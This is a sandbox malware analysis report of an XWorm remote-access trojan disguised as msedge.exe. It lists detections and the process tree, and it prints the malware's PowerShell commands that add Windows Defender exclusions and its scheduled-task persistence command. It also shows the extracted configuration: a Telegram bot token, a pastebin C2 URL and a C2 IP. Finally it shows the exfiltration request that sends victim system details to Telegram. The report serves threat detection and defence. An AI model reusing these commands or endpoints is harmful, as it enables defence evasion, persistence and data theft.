Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
msedge.exe

Overview

General Information

Sample name:msedge.exe
Analysis ID:1487310
MD5:aee20d80f94ae0885bb2cabadb78efc9
SHA1:1e82eba032fcb0b89e1fdf937a79133a5057d0a1
SHA256:498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • msedge.exe (PID: 3840 cmdline: "C:\Users\user\Desktop\msedge.exe" MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
    • powershell.exe (PID: 6968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5008 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 3392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msedge.exe (PID: 6648 cmdline: C:\Users\user\AppData\Local\msedge.exe MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
  • msedge.exe (PID: 3176 cmdline: "C:\Users\user\AppData\Local\msedge.exe" MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
  • msedge.exe (PID: 7048 cmdline: "C:\Users\user\AppData\Local\msedge.exe" MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
  • msedge.exe (PID: 1512 cmdline: C:\Users\user\AppData\Local\msedge.exe MD5: AEE20D80F94AE0885BB2CABADB78EFC9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": "https://pastebin.com/raw/RPPi3ByL", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
msedge.exeJoeSecurity_XWormYara detected XWormJoe Security
    msedge.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      msedge.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8b3e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8bdb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8cf0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x87b6:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\msedge.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\msedge.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Local\msedge.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x8b3e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x8bdb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x8cf0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x87b6:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.3362810960.0000000002982000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x115fe:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x1169b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x117b0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x11276:$cnc4: POST / HTTP/1.1
              00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x893e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x89db:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x8af0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x85b6:$cnc4: POST / HTTP/1.1
                Click to see the 2 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.msedge.exe.590000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.msedge.exe.590000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.msedge.exe.590000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x8b3e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x8bdb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x8cf0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x87b6:$cnc4: POST / HTTP/1.1

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\msedge.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\msedge.exe, ProcessId: 3840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\msedge.exe, ProcessId: 3840, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
                    Sigma detected: Suspicious Electron Application Child Processes
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe", ProcessId: 5008, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 3840, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe', ProcessId: 6968, ProcessName: powershell.exe

                    Snort Signatures

                    No Snort rule has matched

                    Suricata Signatures

                    Timestamp:2024-08-03T20:11:28.691332+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:38.074505+0200
                    SID:2852923
                    Source Port:49722
                    Destination Port:7000
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:38.696832+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:52.511794+0200
                    SID:2852923
                    Source Port:49722
                    Destination Port:7000
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:55.631124+0200
                    SID:2852874
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:12:06.948813+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:43.679696+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:18.800314+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:23.649351+0200
                    SID:2852923
                    Source Port:49722
                    Destination Port:7000
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:13.677035+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:53.694351+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:23.793667+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:12:03.700019+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:12:13.700722+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:48.683210+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:58.696172+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:12:12.990412+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:38.072914+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:08.809199+0200
                    SID:2853685
                    Source Port:49721
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-08-03T20:12:06.950681+0200
                    SID:2852923
                    Source Port:49722
                    Destination Port:7000
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:25.636313+0200
                    SID:2852874
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:52.509901+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:12:12.991173+0200
                    SID:2852923
                    Source Port:49722
                    Destination Port:7000
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:23.448430+0200
                    SID:2855924
                    Source Port:49722
                    Destination Port:7000
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:33.687117+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:12:08.705779+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-03T20:11:23.647357+0200
                    SID:2852870
                    Source Port:7000
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: msedge.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\msedge.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Found malware configuration
                    Source: msedge.exeMalware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/RPPi3ByL", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187"}
                    Source: msedge.exe.3840.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\msedge.exeReversingLabs: Detection: 71%
                    Source: C:\Users\user\AppData\Local\msedge.exeVirustotal: Detection: 65%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: msedge.exeVirustotal: Detection: 65%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\msedge.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: msedge.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: msedge.exeString decryptor: https://pastebin.com/raw/RPPi3ByL
                    Source: msedge.exeString decryptor: <123456789>
                    Source: msedge.exeString decryptor: <Xwormmm>
                    Source: msedge.exeString decryptor: XWorm V5.6
                    Source: msedge.exeString decryptor: USB.exe
                    Source: msedge.exeString decryptor: %LocalAppData%
                    Source: msedge.exeString decryptor: msedge.exe
                    Source: msedge.exeString decryptor: 7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4
                    Source: msedge.exeString decryptor: 5279018187
                    Source: msedge.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49721 version: TLS 1.2
                    Source: msedge.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://pastebin.com/raw/RPPi3ByL
                    Connects to a pastebin service (likely for C&C)
                    Source: unknownDNS query: name: pastebin.com
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: msedge.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.6:49722 -> 213.219.149.161:7000
                    Source: global trafficHTTP traffic detected: GET /raw/RPPi3ByL HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
